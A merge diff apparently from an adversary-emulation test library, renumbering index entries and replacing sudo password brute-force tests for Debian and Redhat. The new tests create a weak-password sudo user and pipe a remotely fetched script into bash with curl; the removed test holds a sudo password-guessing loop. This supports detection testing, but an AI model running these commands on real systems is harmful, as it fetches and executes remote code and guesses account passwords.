Merge branch 'master' into T1012

atomics/Indexes/Indexes-CSV/index.csv

@@ -1030,9 +1030,9 @@ credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,ae
 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
 credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
-credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
-credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
-credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
+credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -173,8 +173,8 @@ credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to
 credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
 credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
 credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
-credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
-credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
+credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
+credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -719,7 +719,7 @@ lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing R
 credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
-credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -1676,9 +1676,9 @@
   - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
   - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
   - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
-  - Atomic Test #4: SUDO brute force Debian [linux]
-  - Atomic Test #5: SUDO brute force Redhat [linux]
-  - Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #5: SUDO Brute Force - Debian [linux]
+  - Atomic Test #6: SUDO Brute Force - Redhat [linux]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -392,8 +392,8 @@
   - Atomic Test #5: SSHD PAM keylogger [linux]
   - Atomic Test #6: Auditd keylogger [linux]
 - [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
-  - Atomic Test #4: SUDO brute force Debian [linux]
-  - Atomic Test #5: SUDO brute force Redhat [linux]
+  - Atomic Test #5: SUDO Brute Force - Debian [linux]
+  - Atomic Test #6: SUDO Brute Force - Redhat [linux]
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1195,7 +1195,7 @@
 - [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
   - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
   - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
-  - Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]

atomics/Indexes/index.yaml

@@ -74960,81 +74960,6 @@ credential-access:
             }
           }
           Write-Host "End of bruteforce"
-    - name: SUDO brute force Debian
-      auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-      description: |
-        Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
-        PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
-        If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
-        The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
-      supported_platforms:
-      - linux
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'Check if running on a Debian based machine.
-
-          '
-        prereq_command: |
-          if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-          if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
-          cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
-          cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
-          if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-        get_prereq_command: 'apt-get update && apt-get install -y sudo
-
-          '
-      executor:
-        elevation_required: false
-        command: |
-          for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
-          echo done
-        cleanup_command: 'rm -f /tmp/asker /tmp/workingfile
-
-          '
-        name: sh
-    - name: SUDO brute force Redhat
-      auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
-      description: "Brute force the password of a local user account which is a member
-        of the sudo'ers group on a Redhat based Linux distribution.  \n"
-      supported_platforms:
-      - linux
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'Check if running on a Redhat based machine.
-
-          '
-        prereq_command: |
-          if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
-          if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
-          if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-          if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-        get_prereq_command: 'yum -y update && yum install -y openssl sudo
-
-          '
-      executor:
-        elevation_required: true
-        command: |
-          useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
-          su target
-
-          PASSWORDS=(one two three password five); \
-              touch /tmp/file; \
-              for P in ${PASSWORDS[@]}; do \
-                  date +"%b %d %T"; \
-                  sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-                  echo "exit: $?"; \
-                  if grep -q "root" /tmp/file; then \
-                      echo "FOUND: sudo => $P"; break; \
-                  else \
-                      echo "TRIED: $P"; \
-                  fi; \
-                  sleep 2; \
-              done; \
-              rm /tmp/file
-        cleanup_command: 'userdel target
-
-          '
-        name: sh
     - name: Password Brute User using Kerbrute Tool
       auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
       description: 'Bruteforce a single user''s password from a wordlist
@@ -75080,6 +75005,92 @@ credential-access:
         elevation_required: false
         command: "cd $env:temp\n.\\kerbrute.exe bruteuser --dc #{domaincontroller}
           -d #{domain} $env:temp\\bruteuser.txt TestUser1 \n"
+    - name: SUDO Brute Force - Debian
+      auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
+      description: "An adversary may find themselves on a box (e.g. via ssh key auth,
+        with no password) with a user that has sudo'ers privileges, but they do not
+        know the users password. Normally, failed attempts to access root will not
+        cause the root account to become locked, to prevent denial-of-service. This
+        functionality enables an attacker to undertake a local brute force password
+        guessing attack without locking out the root user. \n\nThis test creates the
+        \"art\" user with a password of \"password123\", logs in, downloads and executes
+        the sudo_bruteforce.sh which brute force guesses the password, then deletes
+        the user\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        remote_url:
+          description: url of remote payload
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Check if running on a Debian based machine.
+
+          '
+        prereq_command: |
+          if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+          if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+          if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+          if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+        get_prereq_command: 'apt update && apt install -y openssl sudo curl
+
+          '
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
+          su art
+          cd /tmp
+          curl -s #{remote_url} |bash
+        cleanup_command: 'userdel -fr art
+
+          '
+    - name: SUDO Brute Force - Redhat
+      auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
+      description: "An adversary may find themselves on a box (e.g. via ssh key auth,
+        with no password) with a user that has sudo'ers privileges, but they do not
+        know the users password. Normally, failed attempts to access root will not
+        cause the root account to become locked, to prevent denial-of-service. This
+        functionality enables an attacker to undertake a local brute force password
+        guessing attack without locking out the root user. \n\nThis test creates the
+        \"art\" user with a password of \"password123\", logs in, downloads and executes
+        the sudo_bruteforce.sh which brute force guesses the password, then deletes
+        the user\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        remote_url:
+          description: url of remote payload
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Check if running on a Redhat based machine.
+
+          '
+        prereq_command: |
+          if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
+          if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
+          if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+          if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+        get_prereq_command: 'yum update && yum install -y openssl sudo curl
+
+          '
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
+          su art
+          cd /tmp
+          curl -s #{remote_url} |bash
+        cleanup_command: 'userdel -fr art
+
+          '
   T1003:
     technique:
       x_mitre_platforms: